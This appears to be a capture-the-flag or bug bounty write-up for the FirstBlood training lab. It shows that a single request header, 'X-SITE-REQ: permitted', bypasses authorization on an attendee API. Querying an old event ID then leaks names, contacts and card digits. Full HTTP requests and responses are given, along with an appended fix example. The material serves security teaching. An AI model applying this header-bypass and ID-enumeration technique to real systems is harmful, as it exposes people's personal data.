FirstBlood-#28/attendees/event.php authorization bypass using X-SITE-REQ: permitted



On 2021-05-09, jpdev reported:

Summary

Within /manageappointment.php there is a reference to an X-SITE-REQ: permitted header. Using this on the page /hackerback.html it is possible to return attendance information, bypassing authorization on the endpoint /attendees/event.php.

Within the /hackerback.html page there is a reference to an API that is queried to return all of the attendee names and their status:

<script>
    // Client-side flag gates the call to the attendee API; the server
    // must not rely on it, since any client can issue the request directly.
    function getAttendees() {
        var attending = false;

        if (attending == true) {
            sendRequest("/attendees/event.php?q=560720");
        }
    }
</script>

You can bypass this attending check by first navigating to /attendees/event.php?q=560720 and capturing the request within Burp, sending it to Repeater, adding the X-SITE-REQ: permitted header to the request and submitting it. It will return a JSON object with attendance information.

REQUEST

GET /attendees/event.php?q=560720 HTTP/1.1
Host: firstbloodhackers.com:49227
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-SITE-REQ: permitted
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49227/drpanel/index.php
Upgrade-Insecure-Requests: 1

RESPONSE

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 15:44:12 GMT
Content-Type: application/json
Connection: close
Content-Length: 3267

{"event":[{"id":"560720","title":"HackerBack","description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{}],"able_to_modify":"false","is_event_hidden":"false","old_title":"HackerBack","old_eventID":"560700","old_description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","old_massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","old_time":"N/A","old_when":"N/A","cancelled_attendees":[{"fName":"Sean","cancelled":"true"},{"fName":"Abi","cancelled":"true"},{"fName":"John","cancelled":"true"},{"fName":"Melissa","cancelled":"true"}]}]}

Expanded further

Within the response an old_eventID is returned. Using this old_eventID to query the same API we can return sensitive information such as name, telephone, email and the last 4 digits of the CC.

Request

GET /attendees/event.php?q=560700 HTTP/1.1
Host: firstbloodhackers.com:49227
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-SITE-REQ: permitted
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49227/drpanel/index.php
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 16:03:28 GMT
Content-Type: application/json
Connection: close
Content-Length: 3622

{"event":[{"id":"560700","title":"HackerBack","description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{"name":"Sean R","email":"[email protected]","confirmed":true,"contactNumber":"+44 141 496 0250","last_4_CC":"9090"},{"name":"Trevor B","email":"[email protected]","confirmed":true,"contactNumber":"+44 116 496 0581","last_4_CC":"5323"},{"name":"Julie L","email":"[email protected]","confirmed":true,"contactNumber":"+44 117 496 0999","last_4_CC":"1337"}],"able_to_modify":"false","is_event_hidden":"false","old_title":"HackerBack","old_eventID":"n/a","old_description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking. At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","old_massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","old_time":"N/A","old_when":"N/A","cancelled_attendees":[{"fName":"Sean","cancelled":"true"},{"fName":"Abi","cancelled":"true"},{"fName":"John","cancelled":"true"},{"fName":"Melissa","cancelled":"true"}]}]}

Impact

Authorization bypass on the API endpoint by adding the "X-SITE-REQ: permitted" header, returning attendance data.

Expanded into leaking PII: name, telephone, email and last 4 digits of CC.

P1 CRITICAL

Endpoint: /attendees/event.php

Parameter: /attendees/event.php

Payload: X-SITE-REQ: permitted


FirstBlood ID: 13
Vulnerability Type: Info leak

/attendees/event can be seen on the HackerBack.html page but has a blank response. Upon further inspection and from making use of the web app, you will notice you can add certain headers in order to interact with this endpoint. An old event ID leaks PII information about attendees.
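To make the root cause concrete, here is an added model of the flaw described in this report beside a corrected check. It is not code from the report or from the FirstBlood application: the event ids, header name and field names follow the report, while the in-memory data store, the Request shape and the EVENT_OWNER map are assumptions.

```python
# Added example, not the app's code: the reported authorization flaw (a
# client-controlled X-SITE-REQ header is the only gate) next to a check
# derived from the server-side session. Event ids and field names follow
# the report; the data store, Request shape and ownership map are assumed.
from dataclasses import dataclass, field

# Constructed data modelled on the two events in the report.
EVENTS = {
    "560720": {"title": "HackerBack", "old_eventID": "560700",
               "attendees": []},
    "560700": {"title": "HackerBack", "old_eventID": "n/a",
               "attendees": [{"name": "Sean R", "last_4_CC": "9090"}]},
}
# Assumed: which authenticated account may view each event's attendee list.
EVENT_OWNER = {"560720": "organiser", "560700": "organiser"}


@dataclass
class Request:
    query: dict                                  # parsed query string
    headers: dict = field(default_factory=dict)  # client-controlled input
    session: dict = field(default_factory=dict)  # server-side session state


def event_vulnerable(req: Request):
    """Reproduces the reported behaviour: the only gate is a request
    header, which any client can add, so q= selects any event's data."""
    if req.headers.get("X-SITE-REQ") != "permitted":
        return None
    return EVENTS.get(req.query.get("q"))


def event_fixed(req: Request):
    """Authorization comes from the server-side session only. Headers never
    influence the decision, and the same check applies to whatever id is
    requested, so an 'old' event id gets no special treatment."""
    user = req.session.get("user")
    event_id = req.query.get("q")
    if user is None or EVENT_OWNER.get(event_id) != user:
        return None  # anonymous, or not the owner: nothing is returned
    ev = EVENTS[event_id]
    # Return only what the page needs; internal linkage such as old_eventID
    # stays server-side instead of being handed to the client.
    return {"id": event_id, "title": ev["title"],
            "attendees": ev["attendees"]}


if __name__ == "__main__":
    forged = Request({"q": "560700"}, {"X-SITE-REQ": "permitted"})
    print("vulnerable:", event_vulnerable(forged))   # PII comes back
    print("fixed, anonymous:", event_fixed(forged))  # None
```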


Respect Earnt: 1500000